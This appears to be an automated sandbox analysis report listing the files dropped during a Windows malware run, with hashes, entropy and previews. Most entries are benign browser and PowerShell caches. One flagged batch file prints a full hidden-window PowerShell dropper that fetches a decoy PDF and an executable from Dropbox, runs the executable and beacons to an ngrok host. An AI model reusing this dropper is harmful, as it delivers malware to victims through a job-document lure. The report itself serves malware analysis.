                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                  Entropy (8bit):3.840670085100194
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxIxl9Il8ulf4M4l0nBslRZ5mUsJl7Yd1rc:m1YDf4Jl0narGUsrr
                                                                                                                                                                                                                                                                  MD5:3F9C6B1DC7DBE36159F1555E92BC2921
                                                                                                                                                                                                                                                                  SHA1:B4AEE79913586312ACE1DCD6DDFAB6913E0C8480
                                                                                                                                                                                                                                                                  SHA-256:E3670CC12CB20A23F16C170CD4B854194780576CEF0A56683A989D2EFB69998C
                                                                                                                                                                                                                                                                  SHA-512:DEAD13D51D8ED39B54D26E80C5FF0B8ADEFF8E090002FFFECA177081D3F255D612BB338F63EEE2476CD71BBC6E222AC2D04A73B8F14E4E7EB8E66B856A204628
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L.8.B.H.B.x.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.E.0.t.6.h.d.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                  Entropy (8bit):3.9990139379569842
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:jYDf4DtcrwkKuByyDyYMEq83ICiELGADuYq9/+qPH:jGf4LHukVYj3IZYzDuJt+I
                                                                                                                                                                                                                                                                  MD5:F743D6AD62683158235E676CB1AC278F
                                                                                                                                                                                                                                                                  SHA1:1F73F8B5ED4BDF13F841A19A941865D015B22DA1
                                                                                                                                                                                                                                                                  SHA-256:4C3607EDD036E6C3F7A075F0927949BD60E7C600B6ED01FEF3CD407C9EFC3475
                                                                                                                                                                                                                                                                  SHA-512:4E7E349892382DEABFA79425B8184CE287295D47CF06C3DB15DC121B9C05AB48CD53626BD6674C4F1C26952161ED316E2D1EB2D60412D9C22BDB116703A4A783
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".K.w.X.o.A.R.R.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.E.0.t.6.h.d.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8984338350127876
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xxxl9Il8ulf4L0DD1PdwSfFn8HCKikT8qgtxeGlxAd/vc:aPYDf4L0f1Pd5n2igxgtkGlx5
                                                                                                                                                                                                                                                                  MD5:E882549C56C8EB1846A8C4AFBAB42CD1
                                                                                                                                                                                                                                                                  SHA1:0DB88954694A45D567702D271A213D36F084A37D
                                                                                                                                                                                                                                                                  SHA-256:FF49976C7C73208F478FB54AC359D65EB87CB9D8AC3E03C065ECAE1547A715DE
                                                                                                                                                                                                                                                                  SHA-512:B0C6FD48A5F19AEC24D41659AA9EFC064A2C93C3BBE59935178BE0126616871067B2117C947C053DB63EB7A6152B8E0C86429C099FEAEF34E37EFC9E05F1DFCF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".7.Y.2.W.M.u.V.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.E.0.t.6.h.d.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):61147
                                                                                                                                                                                                                                                                  Entropy (8bit):5.077943793919534
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                                                                                                                                                                  MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                                                                                                                                                                  SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                                                                                                                                                                                                                                  SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                                                                                                                                                                  SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0818136700495735
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Nlllulrlgll//Z:NllUml
                                                                                                                                                                                                                                                                  MD5:BCE202BE96167104C292ABBA72DDA325
                                                                                                                                                                                                                                                                  SHA1:2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
                                                                                                                                                                                                                                                                  SHA-256:680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
                                                                                                                                                                                                                                                                  SHA-512:195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:@...e................................................@..........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\0eb8b1b7-c32a-40f3-9864-35ef68ae14e0.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1846d1e0-9dcc-4892-a53a-49a53350f877.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\475161710.bat

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (822), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):839
                                                                                                                                                                                                                                                                  Entropy (8bit):5.636449691752557
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:0G/j59O3JRl+42qtE3JSWSTRwg+3V+cZr:N/j59OVp2qGnSFwpEc1
                                                                                                                                                                                                                                                                  MD5:012811046DFA8F424BE99C6CBCD9D630
                                                                                                                                                                                                                                                                  SHA1:B732CB2A8DFD768570C824E2A7A5192CA7B2232B
                                                                                                                                                                                                                                                                  SHA-256:C9A275C77B8DA9BD360C201B32F6BB83676EE1DBB4C34DC02D87B706BDED5833
                                                                                                                                                                                                                                                                  SHA-512:551FFF9ED7C981C3517875C9C7B1D9E4F6F27113E619A60AC97C948F342A3A07BB7F441B8E906FB804046DF24912C78CE14AAF5FCA74B0E519F746B26A678145
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:@echo off..powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"..exit

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\586a178e-5eb5-471a-aeeb-fe51ca4d98a3.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):263704
                                                                                                                                                                                                                                                                  Entropy (8bit):7.998774950072608
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:6144:vj1QHfvuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:vjq/GGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                  MD5:EF6DB67B82032D675EA4E61A73D3C358
                                                                                                                                                                                                                                                                  SHA1:882A4CF2944FC8E27F435890DF647177AD167CB0
                                                                                                                                                                                                                                                                  SHA-256:97C885F4390FFAE57EF240B46E113A0DFF637A003B6AD54031A1AA6809956276
                                                                                                                                                                                                                                                                  SHA-512:B41B3CD76F50964CD4FA0AB18BEB785FA592CB92045B3455D238799A1167CB5190EB1C7E0216E1E874AA03A8686025A6B366926023C9C56834B92B4F612D0A18
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:............ko..q?....Am..0.<.M...e.B,[......|J..............x..8. .w73;;;;....L.....La.k&.k..........~...#..........%.Y.>}.j~.O.r..L....R.`..w......ta.'.....~:.9.'C...|..Gt...'..y..?...}..........,....1?..)QX....tgpgN.`..~...'.h.3^.s..UT...~o..R.].4^..V8"JwfnH...%..........i.qmG4.1@....a....\.i.C..Rq9.h....\..j...u..O..O.5!.}x....%j..}CW+.*..jaA.......-...*....P?..vA3+iU...N...%...x.E.8.Z..2HQw._.H8........+Lw].wL..........tc..l.+p..7..<).......Z.!..!i......?./.P9.y..;....,..C.K.....~.0........E...n..(..&.X...na-c.6.....Q.[.p.IO....[...W$....l7J.,..=EK.3Y...R...|..z_i.q......./.......[..5..qE.....FM+..VRB...r9!{3.....!...;.,{..}.sP..m..f.....~..2J..4.+..i6M...EW..ON..N.........4...T...j...1:..E=..<....Y..w.MV.....w.q.{...Y.....J...@.W..i.Sm;..0.1......./.4..b.wPbK.yeZ@.I...0.C.TZ$...-.+.[*......w.qG..}B^........n....#.........Y4.g4.....(.K..e..q7[.{..W....,%...z.^N...[/?......).9/?...r].oM2.'G.gu..Q|..._+......1^...9......-.j2lae..+!3

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\5b7b8fec-0c0f-406a-aa7a-99df8f1d15c6.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2949120
                                                                                                                                                                                                                                                                  Entropy (8bit):6.502462534743587
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:49152:hk8NZ7wn41Ba0Tfr/aC+1RIYkqYl+RjkgOQ1EIIH39yH0DLtx:pNpwn415ajvI1qYkrO9ftx
                                                                                                                                                                                                                                                                  MD5:F7A506F00E525E6D23AEE43D34219625
                                                                                                                                                                                                                                                                  SHA1:595AB94FA622DAFB3423F6F8AFFFC9B3E78BFB5D
                                                                                                                                                                                                                                                                  SHA-256:7ECD27F823A5D81FE3A3AD79287355DBD526518C5758994B8D728BDFBBBA4AC6
                                                                                                                                                                                                                                                                  SHA-512:465E92537A997DC30B909A8A2F7FB9956A495E52FC5736CA660CB0FA81F7BAFF6ACA80637F724875FBC3D0981A7D995C4C99F8AD9019689363CFA4E12A7B5C44
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn......@n.......n......Cn......Gn.......n......Wn......Kn......Pn......Ln..Qn..qo.......n....A.Pn..Qn).Pn......Pn..RichQn..........PE..L.....f...............!.....4#...................@..........................P-......D"...@.................................."..........p. ..............)...........w..p...........................@v..@............................................text............................... ..`.rdata...`.......T..................@..@.data....`...@...>... ..............@....rsrc...p. ....... ..^..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\702ea43e-9b96-439b-a4d1-4cbd53c5e74a.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                                                                                                                  Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                                                                                  MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
